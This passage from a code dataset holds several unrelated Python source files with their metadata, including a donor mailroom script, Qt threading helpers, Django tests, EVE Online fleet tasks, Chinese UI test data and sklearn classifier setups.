choice in range(len(menu_data)): # Ensure that option chosen is within menu range, this\n return menu_data[choice][1], menu_data[choice][2] # handles choosing 0, which would return menu_data[-1][1]\n\n return None\n\n\ndef make_projections(donors_obj):\n\n min =0\n max =0\n mul = 1\n\n projection = donors_obj.challenge(mul, min, max)\n def set_value():\n while True:\n try:\n value = float(input(\"Set value >\"))\n if value <= 0:\n print(\"Must be a positive number\")\n else:\n break\n except ValueError:\n print(\"Please enter a numerical value\")\n return value\n\n while True:\n projections_menu = [\n (\"enter min amount for multiplier to take effect. [Currently ${}]\".format(mul), set_value, 'min'),\n (\"enter max amount for multiplier to take effect. [Currently ${}]\".format(mul), set_value, 'max'),\n (\"enter a multiplier value. [Currently {}]\".format(mul), set_value, 'mul'),\n (\"print report past distributions\", donors_obj.create_a_report, None),\n (\"Print projected distributions\", projection.create_a_report, None),\n (\"print total contributed comparison\", \"compare_total\", None),\n (\"quit menu\", 'quit', None)\n ]\n\n fn , param = menu(projections_menu)\n if param == 'min':\n min = fn()\n elif param == 'max':\n max = fn()\n elif param == mul:\n mul = fn()\n\n if param:\n projection = donors_obj.challenge(mul, min, max)\n elif fn == 'compare_total':\n print(f\"Original total contribution: {donors_obj.total_contribution():.2f}\")\n print(f\"Projeected total contribution: {projection.total_contribution():.2f}\")\n elif fn == 'quit':\n return\n else:\n fn()\n\nif __name__ == \"__main__\":\n donors_obj = Donors()\n menu_fns = [\n ('Send thank you', send_a_thankyou, donors_obj),\n ('create a report', donors_obj.create_a_report, None),\n ('send letters to every one', donors_obj.send_letters, None),\n ('load donors list', donors_obj.load_donors_list, None),\n ('save donors list', donors_obj.save_donors_list, None),\n ('quit', sys.exit, None)\n ]\n\n #choice_dict = {1: send_a_thankyou, 2: donors_obj.create_a_report, 3: donors_obj.send_letters,\n # 4: donors_obj.load_donors_list, 5: donors_obj.save_donor_list, 6: sys.exit}\n while True:\n try:\n fn , param = menu(menu_fns)\n if param:\n fn(param)\n else:\n fn()\n except TypeError:\n continue\n except ValueError:\n continue\n\n\n\n\n\n","sub_path":"students/msirisha/lesson04/mailroom.py","file_name":"mailroom.py","file_ext":"py","file_size_in_byte":8973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"255073354","text":"# -*- coding: utf-8 -*-\n\"\"\"\nActitrack 解析\n\"\"\"\nimport os\nimport sys\nimport glob\nimport csv #csvモジュールをインポートする\nimport datetime\nimport numpy as np\nimport pandas as pd\nfrom time import sleep\nfrom tqdm import tqdm\n\n#設置ディレクトリ\nprint(\"設置ディレクトリ : %s\" % os.path.dirname(__file__))\ndir_root = os.path.dirname(__file__)\ndir_replace = dir_root + \"\\low_data\\\\\"\n\n# ファイル一覧を取得\ndir_low = dir_root + \"\\excel\\*.xlsx\"\nfiles_list_total = glob.glob(dir_low)\n# 結果を格納するデータフレーム\ndf_result = pd.DataFrame(\n\t{\"Subject Name\":[],\n\t \"AN. Time Interval STOP\":[],\n\t \"Immobility Duration Total (Seconds)\":[],\n\t},\n\t columns=[\"Subject Name\",\"AN. Time Interval STOP\",\"Immobility Duration Total (Seconds)\"])\n\nprint(files_list_total)\nn = 0\n# メイン\nfor file in tqdm(files_list_total):\n\tif n == 0:\n\t\t# print(\"ファイル名は\" + file + \"です\")\n\t\twith open(file, 'r') as f:\n\t\t\t#シート名を指定して読み込み\n\t\t\tsheet = \"Summary Report\"\n\t\t\treader = csv.reader(f)\n\t\t\tEXL = pd.ExcelFile(file) # xlsxOpen\n\t\t\t#ヘッダーを含みシートを開く\n\t\t\tData = EXL.parse(sheet) # DataFrameとして読込\n\t\t\t#データ抽出\n\t\t\tData_split = Data.loc[:,[\"Subject Name\",\"AN. Time Interval STOP\",\"Immobility Duration Total (Seconds)\"]]\n\t\t\tID = Data_split.iloc[0,:][1]\n\t\t\tID = str(ID)\n\t\t\tData_split[\"%s\" %ID] = Data_split[\"Immobility Duration Total (Seconds)\"]\n\t\t\t# print(Data_split[\"Immobility Duration Total (Seconds)\"])\n\t\t\t#print(Data_split)\n\t\t\tdf_result = Data_split.loc[:,[\"Subject Name\",\"%s\" %ID]]\n\t\t\t#df_result = pd.merge(df_result, Data_split, on=\"Subject Name\")\n\t\t\tn = n +1\n\telse:\n\t\twith open(file, 'r') as f:\n\t\t\t#シート名を指定して読み込み\n\t\t\tsheet = \"Summary Report\"\n\t\t\treader = csv.reader(f)\n\t\t\tEXL = pd.ExcelFile(file) # xlsxOpen\n\t\t\t#ヘッダーを含みシートを開く\n\t\t\tData = EXL.parse(sheet) # DataFrameとして読込\n\t\t\t#データ抽出\n\t\t\tData_split = Data.loc[:,[\"Subject Name\",\"AN. Time Interval STOP\",\"Immobility Duration Total (Seconds)\"]]\n\t\t\tID = Data_split.iloc[0,:][1]\n\t\t\tID = str(ID)\n\t\t\tData_split[\"%s\" %ID] = Data_split[\"Immobility Duration Total (Seconds)\"]\n\t\t\t#df_result = pd.concat([df_result, Data_split],axis=0)\n\t\t\tdf_result = pd.merge(df_result, Data_split.loc[:,[\"Subject Name\",\"%s\" %ID]], on=\"Subject Name\")\n\n# print(df_result)\n\nfilename = datetime.datetime.today()\noutput_path = \"Analysis/\" + filename.strftime(\"%Y%m%d%H%M%S\") + \".xlsx\"\nprint(output_path)\n\n#pandasのモジュールであるExcelWriterを使用してエクセルに書き込む形式にする\nwriter = pd.ExcelWriter(output_path)\ndf_result.to_excel(writer, sheet_name = 'time')\nwriter.save()\n\n\n","sub_path":"FST_data/FTS_analysis.py","file_name":"FTS_analysis.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"168694976","text":"\"\"\"Functions for working with threads in Qt applications. Usually for dealing\nwith running in the main event loop (e.g. thread) or not.\n\nThese functions are known to work as reasonable replacements for the functions\nprovided by both Maya and Nuke.\n\nWe want to be able to use these functions and have them present reasonable\nactions even if there is no event loop. In most cases, that means immediately\ncalling the function.\n\nAnother large benefit of these functions is that they are re-rentrant, unlike\nthe functions provided in either Maya or Nuke which will lock up the main\nthread if called from the main thread.\n\n\"\"\"\n\nfrom __future__ import absolute_import\n\nimport Queue as queue\nimport traceback\nimport sys\n\nfrom .qt import Q, QtCore\n\n\nif QtCore is not None:\n\n\n class _Event(Q.Event):\n\n _type_int = Q.Event.registerEventType()\n _type = Q.Event.Type(_type_int) # Mostly for PySide.\n\n def __init__(self, res_queue, func, args, kwargs):\n super(_Event, self).__init__(self._type)\n self.res_queue = res_queue\n self.func = func\n self.args = args\n self.kwargs = kwargs\n\n def process(self):\n\n self.accept()\n\n try:\n res = self.func(*self.args, **self.kwargs)\n\n # Catch EVERYTHING, including KeyboardInterrupt and SystemExit.\n except:\n\n if self.res_queue:\n self.res_queue.put((False, sys.exc_info()[1]))\n else:\n sys.stderr.write('Uncaught exception in main thread.\\n')\n traceback.print_exc()\n\n else:\n if self.res_queue:\n self.res_queue.put((True, res))\n\n return True\n\n\n class _Dispatcher(Q.Object):\n\n def __init__(self):\n super(_Dispatcher, self).__init__()\n\n self.running = False\n self._app = None\n\n # If we can grab the app, push over to its thread, and then\n # queue up (or immediately call) the signal.\n if self.app:\n self.moveToThread(self.app.thread())\n self.defer(self.signal_start)\n\n # Otherwise, schedule a timer to run (assumed to be in the\n # main thread) so that we can grab the app at that point.\n else:\n Q.Timer.singleShot(0, self.signal_start)\n\n def signal_start(self):\n self.running = True\n if self.thread() is not self.app.thread():\n self.moveToThread(self.app.thread())\n\n @property\n def app(self):\n if self._app is None:\n self._app = Q.Application.instance()\n return self._app\n\n def event(self, event):\n if isinstance(event, _Event):\n return event.process()\n else:\n return super(_Dispatcher, self).event(event)\n\n def is_main_thread(self):\n return (not self.running) or self.app.thread() is Q.Thread.currentThread()\n\n def defer(self, func, *args, **kwargs):\n\n if self.is_main_thread():\n func(*args, **kwargs)\n return\n\n self.app.postEvent(self, _Event(None, func, args, kwargs))\n\n def call(self, func, *args, **kwargs):\n\n if self.is_main_thread():\n return func(*args, **kwargs)\n\n # TODO: Be able to figure out when the function is called\n # but does not throw something into the queue (for whatever\n # reasons, so that we can stop blocking. Perhaps a pair of\n # weakrefs?\n\n res_queue = queue.Queue()\n self.app.postEvent(self, _Event(res_queue, func, args, kwargs))\n ok, res = res_queue.get()\n\n if ok:\n return res\n else:\n raise res\n\n\n _dispatcher = _Dispatcher()\n\nelse:\n\n _dispatcher = None\n\n\ndef defer_to_main_thread(func, *args, **kwargs):\n \"\"\"Call the given function in the main thread, but don't wait for results.\n\n If an exception is thrown, a traceback will be printed.\n\n This function is re-entrant, and calling from the main thread will call the\n passed function immediately (discarding the result).\n\n If Qt is not running, it will call the function immediately.\n\n \"\"\"\n if not _dispatcher:\n func(*args, **kwargs)\n return\n _dispatcher.defer(func, *args, **kwargs)\n\n\ndef call_in_main_thread(func, *args, **kwargs):\n \"\"\"Call the given function in the main thread, and wait for results.\n\n If an exception is thrown, it will be reraised here.\n\n This function is re-entrant, and calling from the main thread will call the\n passed function immediately.\n\n If Qt is not running, it will call the function immediately.\n\n \"\"\"\n if not _dispatcher:\n return func(*args, **kwargs)\n return _dispatcher.call(func, *args, **kwargs)\n\n\ndef is_main_thread():\n \"\"\"Return True if this is in the main thread (or Qt is not running).\"\"\"\n if not _dispatcher:\n return True\n else:\n return _dispatcher.is_main_thread()\n\n\n\n\n\n\n","sub_path":"uitools/threads.py","file_name":"threads.py","file_ext":"py","file_size_in_byte":5146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"333134021","text":"def Multiplicar():\r\n\tpergunta = input(\"Montar a tabuada de: \")\r\n\tiniciando = input(\"Começar por: \")\r\n\tterminando = input(\"Terminar em: \")\r\n\tpergunta = int(pergunta)\r\n\tiniciando = int(iniciando)\r\n\tterminando = int(terminando)\r\n\tif iniciando > terminando:\r\n\t\tprint(\"O número final tem que ser maior que o número inicial. \")\r\n\t\treturn Multiplicar()\r\n\tprint()\r\n\tprint(\"Vou montar a tabuada de: \", pergunta, \"começando em \", iniciando, \"e terminando em \", terminando, \":\")\r\n\twhile iniciando <= terminando:\r\n\t\tprint(pergunta, \"x\", iniciando, \"=\", pergunta * iniciando)\r\n\t\tiniciando = iniciando + 1\t\r\n\treturn\r\n\r\nMultiplicar()","sub_path":"Python/Bonus.py","file_name":"Bonus.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"31690063","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win-amd64\\egg\\li_rn_networks\\f_pfc_unit.py\n# Compiled at: 2020-02-18 02:17:35\n# Size of source mod 2**32: 1754 bytes\nimport math, numpy as np, random, non_neuron as nu\nW = np.array([[0, 1], [0.917, 0]])\n\nclass f_PFC_unit:\n\n    def __init__(self, V_d, V_c):\n        self.random_del = 1\n        self.dt = 0.01\n        self.Tau = 10\n        self.Wl = np.array([[0, 0.99], [0.922, 0]])\n        self.Wh = np.array([[0, 1.02], [0.875, 0]])\n        self.b = np.array([[0.0, 0.0]])\n        self.V_d = V_d\n        self.V_c = V_c\n        self.f_FPC_unit_d = nu.neuron()\n        self.f_FPC_unit_d.def_parameter(self.Tau, self.dt, self.random_del)\n        self.f_FPC_unit_c = nu.neuron()\n        self.f_FPC_unit_c.def_parameter(self.Tau, self.dt, self.random_del)\n\n    def def_parameter(self, Tau, dt, random_del):\n        self.random_del = random_del\n        self.dt = dt\n        self.Tau = Tau\n        self.f_FPC_unit_c.def_parameter(self.Tau, self.dt, self.random_del)\n        self.f_FPC_unit_d.def_parameter(self.Tau, self.dt, self.random_del)\n\n    def forward(self, S_d, S_c, ITd, ITc):\n        b_d = np.zeros_like(S_d)\n        b_c = np.zeros_like(S_c)\n        self.V_d, S_d = self.f_FPC_unit_d.forward_it(self.V_d, S_d, self.Wl, b_d, ITd)\n        self.V_c, S_c = self.f_FPC_unit_d.forward_it(self.V_c, S_c, self.Wl, b_c, ITc)\n        return (S_d, S_c)","sub_path":"pycfiles/li_rn_networks-0.1-py3.7/f_pfc_unit.cpython-37.py","file_name":"f_pfc_unit.cpython-37.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"648230324","text":"import json\nfrom django.test import TestCase, Client\nfrom .models import Risk, RiskField, RiskFieldEnumOption\nfrom .enums import RiskTypes, DataTypes\nfrom .serializer import RiskSerializer, RiskFieldSerializer, RiskFieldEnumOptionSerializer\n# Create your tests here.\n\n\nclass SerializerTest(TestCase):\n\n    def setUp(self):\n        self.risk = Risk.objects.create(name='test', risk_type=RiskTypes.AM)\n        RiskField.objects.create(name='text_field', dtype=DataTypes.TE, risk=self.risk,\n                                 description='description')\n        self.field_date = RiskField.objects.create(name='date_field', dtype=DataTypes.DA,\n                                                   risk=self.risk, description='description')\n        self.field_enum = RiskField.objects.create(name='enum_field',\n                                                   dtype=DataTypes.EN, risk=self.risk, description='description')\n        self.option = RiskFieldEnumOption.objects.create(risk_field_id=self.field_enum.id,\n                                                         option='option1')\n        RiskFieldEnumOption.objects.create(risk_field_id=self.field_enum.id, option='option2')\n\n    def test_risk_field_enum_option_serializer(self):\n        opt_srlzr = RiskFieldEnumOptionSerializer(self.option)\n        srlzr_data = opt_srlzr.data\n        self.assertEqual(srlzr_data['option'], 'option1')\n\n    def test_risk_field_serializer(self):\n        fld_srlzr = RiskFieldSerializer(self.field_date)\n        srlzr_data = fld_srlzr.data\n        self.assertEqual(srlzr_data['name'], 'date_field')\n        self.assertEqual(srlzr_data['description'], 'description')\n        self.assertEqual(srlzr_data['dtype'], 'date')\n        self.assertEqual(len(srlzr_data['options']), 0)\n\n        fld_srlzr = RiskFieldSerializer(self.field_enum)\n        srlzr_data = fld_srlzr.data\n        self.assertEqual(srlzr_data['name'], 'enum_field')\n        self.assertEqual(srlzr_data['description'], 'description')\n        self.assertEqual(srlzr_data['dtype'], 'enum')\n        self.assertEqual(len(srlzr_data['options']), 2)\n\n    def test_risk_field(self):\n        rsk_srlzr = RiskSerializer(self.risk)\n        srlzr_data = rsk_srlzr.data\n        self.assertEqual(srlzr_data['name'], 'test')\n        self.assertEqual(srlzr_data['id'], self.risk.id)\n        self.assertEqual(srlzr_data['risk_type'], 'automobile')\n        self.assertEqual(len(srlzr_data['fields']), 3)\n\n\nclass ViewTest(TestCase):\n\n    def setUp(self):\n        self.risk = Risk.objects.create(name='test', risk_type=RiskTypes.AM)\n        RiskField.objects.create(name='text_field', dtype=DataTypes.TE, risk=self.risk,\n                                 description='description')\n        self.field_date = RiskField.objects.create(name='date_field', dtype=DataTypes.DA,\n                                                   risk=self.risk, description='description')\n        self.field_enum = RiskField.objects.create(name='enum_field',\n                                                   dtype=DataTypes.EN, risk=self.risk, description='description')\n        self.option = RiskFieldEnumOption.objects.create(risk_field_id=self.field_enum.id,\n                                                         option='option1')\n        RiskFieldEnumOption.objects.create(risk_field_id=self.field_enum.id, option='option2')\n\n    def test_get_risk(self):\n        client = Client()\n        response = client.get('/get/risk/' + str(self.risk.id) + '/')\n        self.assertEqual(response.status_code, 200)\n        data = json.loads(response.content.decode('utf-8'))\n        self.check_response(data)\n\n        client = Client()\n        response = client.get('/get/risk/' + str(self.risk.id + 10) + '/')\n        self.assertEqual(response.status_code, 404)\n\n    def test_get_all_risk(self):\n        client = Client()\n        response = client.get('/get/risks/')\n        data = json.loads(response.content.decode('utf-8'))\n        self.assertEqual(len(data), 1)\n        self.check_response(data[0])\n\n    def check_response(self, data):\n        self.assertEqual(data['name'], 'test')\n        self.assertEqual(data['risk_type'], 'automobile')\n        self.assertEqual(data['id'], self.risk.id)\n        self.assertEqual(len(data['fields']), 3)\n        fields = sorted(data['fields'], key=lambda f: f['dtype'])\n        self.assertEqual([f['name'] for f in fields], ['date_field', 'enum_field', 'text_field'])\n        options = sorted(fields[1]['options'], key=lambda o: o['option'])\n        self.assertEqual([o['option'] for o in options], ['option1', 'option2'])\n","sub_path":"risk_management/risk_type/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"338536133","text":"from .providers import esi\nfrom .models import Fleet, FleetInformation\nfrom esi.models import Token\nfrom celery import shared_task\nfrom django.utils import timezone\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\n@shared_task\ndef open_fleet(character_id, motd, free_move, name, groups):\n    required_scopes = [\"esi-fleets.read_fleet.v1\", \"esi-fleets.write_fleet.v1\"]\n    c = esi.client\n    token = Token.get_token(character_id, required_scopes)\n    fleet_result = c.Fleets.get_characters_character_id_fleet(\n        character_id=token.character_id, token=token.valid_access_token()\n    ).result()\n    fleet_id = fleet_result.pop(\"fleet_id\")\n    fleet_role = fleet_result.pop(\"role\")\n\n    if fleet_id == None or fleet_role == None or fleet_role != \"fleet_commander\":\n        return\n\n    fleet = Fleet(\n        fleet_id=fleet_id,\n        created_at=timezone.now(),\n        motd=motd,\n        is_free_move=free_move,\n        fleet_commander_id=token.character_id,\n        name=name,\n    )\n    fleet.save()\n    fleet.groups.set(groups)\n\n    esiFleet = {\"is_free_move\": free_move, \"motd\": motd}\n    c.Fleets.put_fleets_fleet_id(\n        fleet_id=fleet_id, token=token.valid_access_token(), new_settings=esiFleet\n    ).result()\n\n\n@shared_task\ndef send_fleet_invitation(character_ids, fleet_id):\n    required_scopes = [\"esi-fleets.write_fleet.v1\"]\n    c = esi.client\n    fleet = Fleet.objects.get(fleet_id=fleet_id)\n    fleet_commander_token = Token.get_token(fleet.fleet_commander_id, required_scopes)\n    _processes = []\n    with ThreadPoolExecutor(max_workers=50) as ex:\n        for _chracter_id in character_ids:\n            _processes.append(\n                ex.submit(\n                    send_invitation,\n                    character_id=_chracter_id,\n                    fleet_commander_token=fleet_commander_token,\n                    fleet_id=fleet_id,\n                )\n            )\n        for item in as_completed(_processes):\n            _ = item.result()\n\n\n@shared_task\ndef send_invitation(character_id, fleet_commander_token, fleet_id):\n    c = esi.client\n    invitation = {\"character_id\": character_id, \"role\": \"squad_member\"}\n    c.Fleets.post_fleets_fleet_id_members(\n        fleet_id=fleet_id,\n        token=fleet_commander_token.valid_access_token(),\n        invitation=invitation,\n    ).result()\n\n\n@shared_task\ndef check_fleet_adverts():\n    required_scopes = [\"esi-fleets.read_fleet.v1\", \"esi-fleets.write_fleet.v1\"]\n    c = esi.client\n    fleets = Fleet.objects.all()\n    for fleet in fleets:\n        token = Token.get_token(fleet.fleet_commander_id, required_scopes)\n        try:\n            fleet_result = c.Fleets.get_characters_character_id_fleet(\n                character_id=token.character_id, token=token.valid_access_token()\n            ).result()\n            fleet_id = fleet_result[\"fleet_id\"]\n            if fleet_id != fleet.fleet_id:\n                fleet.delete()\n        except Exception as e:\n            if e.status_code == 404:  # 404 means the character is not in a fleet\n                fleet.delete()\n                logger.info(\"Character is not in a fleet - fleet advert removed\")\n\n\n@shared_task\ndef get_fleet_composition(fleet_id):\n    required_scopes = [\"esi-fleets.read_fleet.v1\", \"esi-fleets.write_fleet.v1\"]\n    c = esi.client\n    fleet = Fleet.objects.get(fleet_id=fleet_id)\n    token = Token.get_token(fleet.fleet_commander_id, required_scopes)\n    fleet_infos = c.Fleets.get_fleets_fleet_id_members(\n        fleet_id=fleet_id, token=token.valid_access_token()\n    ).result()\n\n    characters = {}\n    systems = {}\n    ship_type = {}\n\n    for member in fleet_infos:\n        characters[member[\"character_id\"]] = \"\"\n        systems[member[\"solar_system_id\"]] = \"\"\n        ship_type[member[\"ship_type_id\"]] = \"\"\n    ids = []\n    ids.extend(list(characters.keys()))\n    ids.extend(list(systems.keys()))\n    ids.extend(list(ship_type.keys()))\n\n    ids_to_name = c.Universe.post_universe_names(ids=ids).result()\n    for member in fleet_infos:\n        index = [x[\"id\"] for x in ids_to_name].index(member[\"character_id\"])\n        member[\"character_name\"] = ids_to_name[index][\"name\"]\n    for member in fleet_infos:\n        index = [x[\"id\"] for x in ids_to_name].index(member[\"solar_system_id\"])\n        member[\"solar_system_name\"] = ids_to_name[index][\"name\"]\n    for member in fleet_infos:\n        index = [x[\"id\"] for x in ids_to_name].index(member[\"ship_type_id\"])\n        member[\"ship_type_name\"] = ids_to_name[index][\"name\"]\n\n    aggregate = get_fleet_aggregate(fleet_infos)\n\n    differential = dict()\n\n    for key, value in aggregate.items():\n        fleet_info_agg = FleetInformation.objects.filter(\n            fleet__fleet_id=fleet_id, ship_type_name=key\n        )\n        if fleet_info_agg.count() > 0:\n            differential[key] = value - fleet_info_agg.latest(\"date\").count\n        else:\n            differential[key] = value\n        FleetInformation.objects.create(fleet=fleet, ship_type_name=key, count=value)\n\n    return FleetViewAggregate(fleet_infos, aggregate, differential)\n\n\n@shared_task\ndef get_fleet_aggregate(fleet_infos):\n    counts = dict()\n\n    for member in fleet_infos:\n        type_ = member.get(\"ship_type_name\")\n        if type_ in counts:\n            counts[type_] += 1\n        else:\n            counts[type_] = 1\n    return counts\n\n\nclass FleetViewAggregate(object):\n    def __init__(self, fleet, aggregate, differential):\n        self.fleet = fleet\n        self.aggregate = aggregate\n        self.differential = differential\n","sub_path":"fleet/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":5565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"389834189","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Author : HalsignRay\n\nfrom __future__ import unicode_literals\nfrom PublicTestData import *\nimport datetime\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\n_get_time = datetime.datetime.now()\n_expired_time = datetime.datetime.strftime(_get_time, '%Y-%m-%d')\n\n_other_symbol_list = special_symbol['other'][\n    'en_symbol'].values() + special_symbol['other']['cn_symbol'].values()\n_all_symbol_list = special_symbol[\n    'defalut_correct'].values() + _other_symbol_list\n_other_list = ['UserGroup_for_add_test', 'qwertyuiopasdfghjklzxcvbnm',\n               '1234567890', 'QWERTYUIOPASDFGHJKLZXCVBNM9']\n\n# 操作界面弹窗提示信息(右下角)\nUserGroupLobiboxNotifyInfo = {\n    'title1': '操作成功',\n    'title2': '友情提示',\n    'msg_add': '操作成功'  # 用户组添加成功提示信息\n}\n\n# 用户组管理界面信息\nUserGroupManageUIInfo = {\n    'Title': '用户组',\n    'AddButton': '新建用户组',\n    'AddButtonTitle': '新建一个用户组',\n    'SearchButton': '搜索',\n    'SearchLabel': '用户组名称',\n    'TabelHead': {\n        'Name': '用户组',\n        'SuperiorGroup': '所属用户组',\n        'Creater': '创建人',\n        'CreateTime': '创建时间',\n        'Opreation': '操作'\n    }\n}\n\n# 用户组编辑界面信息\nUserGroupEditUIInfo = {\n    'AddTitle1': '新建用户组',\n    'AddTitle2': '新建用户组',\n    'EditTitle1': '编辑用户组',\n    'EditTitle2': '编辑用户组',\n    'Name': {\n        'Label': '用户组名称',\n        'MaxLength': '64'\n    },\n    'SuperiorLabel': '上级用户组',\n    'Describe': {\n        'Label': '用户组描述',\n        'MaxLength': '150'\n    },\n    'SaveButton': '保存',\n    'CancelButton': '取消',\n    'ErrorMsg': {\n        'EmptyName': '用户组名称不能为空!',\n        'ErrorName': '用户组名称请选择常用字符,比如汉字,英文,数字等!不能使用逗号,斜杠等特殊字符'\n    }\n}\nrightStr = '%——·!……)(】【���;:;:,《。》?中'\nerrorlist = set(list(errorSymbol)) - set(list(rightStr))\nUserGroupTestData = {\n    'vTopUser': {\n        'username': 'username_for_test_UserGroup',\n        'realname': 'realname_for_test_UserGroup'\n    },\n    'GroupName': ['汉字', rightSymbol + rightStr, number, letters],\n    'ErrorName': errorlist,\n    'DefaultName': 'UserGroup_for_Test',\n    'DefaultGroup': '初始用户组',\n    'EditName': 'UserGroup_EditName_for_Test',\n    'DeleteName': {\n        'Default': 'Default_delete_for_usergroup',\n        'HaveSubset': 'HaveSubset_UserGroup_Test',\n        'Subset': 'SubSet_UserGroup_for_Test',\n        'Allocated': 'Allocated_UserGroup_for_Test'\n    },\n    'SuperiorNumber': 109,\n    'Describe': [errorSymbol, rightSymbol, number, letters],\n    'Creater': {\n        'Admin': '管理员'\n    },\n    'SearchGroup': {\n        'GroupList': ['group_search5', 'group_search1',\n                      'group_search2', 'group_search3'],  # 需要包含search字段\n        'NotExistGroup': '不存在的用户组搜索',\n        'MultipleSearchField': 'search',\n        'SearchSpecialSymbol': [errorSymbol, rightSymbol, number, letters]\n    },\n    'CreatTime': _expired_time  # 时间为日期,没有算到具体几时几分几秒\n}\n","sub_path":"vTopCenterWebAutomation-1.0/TestData/UserGroupTestData.py","file_name":"UserGroupTestData.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"294879047","text":"import os\nfrom common.config import IMG_TYPE\n\n\ndef feature_extract(img_path, model):\n    feats = []\n    feat = model.vgg_extract_feat(img_path)\n    image_name = os.path.split(img_path)[1]\n    feats.append(feat)\n    return feats, image_name\n\n\ndef recursive(path):\n    list = os.listdir(path)\n    arr = []\n    for l in list:\n        if(os.path.isdir(os.path.join(path,l))):\n            cpath = os.path.join(path, l)\n            arr += recursive(cpath)\n        arr.append(os.path.join(path,l))\n    return arr\n\n\ndef filter_img(path):\n    # file_list = os.listdir(path)\n    file_list = recursive(path)\n    return [os.path.join(path, f) for f in file_list if f.split('.')[-1] in IMG_TYPE]\n","sub_path":"encoder/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"447074351","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 13 17:14:33 2021\n\n@authors:\n    João Matos\n    Maria Loureiro\n    Maria Carvalho\n    \n\"\"\"\nimport numpy as np\nfrom timeit import default_timer as timer\nfrom data_load import getDataset, getTestDataset\nfrom evaluation_metrics import getMetrics, getGeneralMetrics, displayGeneralMetrics, displayMetrics\nfrom sklearn import svm\nfrom sklearn.decomposition import PCA\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.feature_selection import SelectKBest, f_classif\nfrom feature_selection import plot_score_features\nfrom sklearn import preprocessing as pp\nfrom sklearn.linear_model import LogisticRegressionCV\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.metrics import confusion_matrix\nimport seaborn as sn\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n#%% SVM models for Gender\n\ndef genderSVM():\n    \n    # SVM Parameters\n    probability_ = True\n    C_ = 100\n    kernel_ = 'linear'\n    gamma_ = 0.01\n    with_PCA_= True\n    PCA_variability_ = 0.95\n    with_ANOVA_ = False\n    k_features_ = 3\n    \n    # Create Model\n    svc = svm.SVC(probability=probability_,\n                  random_state=42, \n                  C=C_, \n                  kernel=kernel_, \n                  gamma=gamma_)\n\n    # Pipelines\n    if with_PCA_:\n        #Create PCA to redimention features to have X % variability\n        pca = PCA(n_components=PCA_variability_, random_state=42)\n        \n        model = make_pipeline(pca, svc)\n        \n    elif with_ANOVA_:\n        \n        #ANOVA filter, take best features\n        anova_filter = SelectKBest(f_classif, k=k_features_)\n        \n        # Make Pipeline\n        model = make_pipeline(anova_filter, svc)\n    else: \n        model = svc\n    \n    return model\n\n#%% Logistic Regression model for Gender\n\ndef genderLogReg():\n    #normalizing the features\n    scaler = pp.StandardScaler()\n    \n    # Train Logistics Regression\n    logReg = LogisticRegressionCV(Cs= 50, solver='newton-cg', random_state=42)\n    \n    model = make_pipeline(scaler, logReg)\n    \n    with_PCA_= False\n    PCA_variability_ = 0.95\n    with_ANOVA_ = False\n    k_features_ = 3\n    \n    # Pipelines\n    if with_PCA_:\n        #Create PCA to redimention features to have X % variability\n        pca = PCA(n_components=PCA_variability_, random_state=42)\n        \n        model = make_pipeline(pca, model)\n        \n    elif with_ANOVA_:\n        \n        #ANOVA filter, take best features\n        anova_filter = SelectKBest(f_classif, k=k_features_)\n        \n        # Make Pipeline\n        model = make_pipeline(anova_filter, model)\n    \n    return model\n\n#%% Random Forest model for Gender\n\ndef genderRandomForest():\n    # RandomForest Parameters  \n    n_estimators_ = 250\n    max_features_ = 'auto'\n    max_depth_ = 10\n    min_samples_leaf_ = 20\n    bootstrap_=True\n    with_ANOVA_ = False\n    k_features_ = 3\n    with_PCA_= False\n    PCA_variability_ = 0.95\n    \n    randForest = RandomForestClassifier(n_estimators=n_estimators_,\n                                        max_features=max_features_,\n                                        max_depth= max_depth_,\n                                        min_samples_leaf=min_samples_leaf_,\n                                        bootstrap = bootstrap_,\n                                        random_state=42)\n    \n    if with_PCA_:\n        #Create PCA to redimention features to have X % variability\n        pca = PCA(n_components=PCA_variability_, random_state=42)\n        \n        model = make_pipeline(pca, randForest)\n        \n    elif with_ANOVA_:\n        \n        #ANOVA filter, take 3 best features\n        anova_filter = SelectKBest(f_classif, k=k_features_)\n        \n        # Make Pipeline\n        model = make_pipeline(anova_filter, randForest)\n        \n    else:\n        model = randForest\n    \n    return model\n\n#%% MLP Classifier for Gender\n\ndef genderMLPClassifier():\n    # Parameters for MLP classifier\n    hidden_layer_sizes_=(100)\n    activation_='relu'\n    solver_='sgd'\n    alpha_=.01\n    learning_rate_='adaptive'\n    early_stopping_ = True\n    max_iter_=500\n    with_ANOVA_ = False\n    k_features_ = 3\n    with_PCA_= False\n    PCA_variability_ = 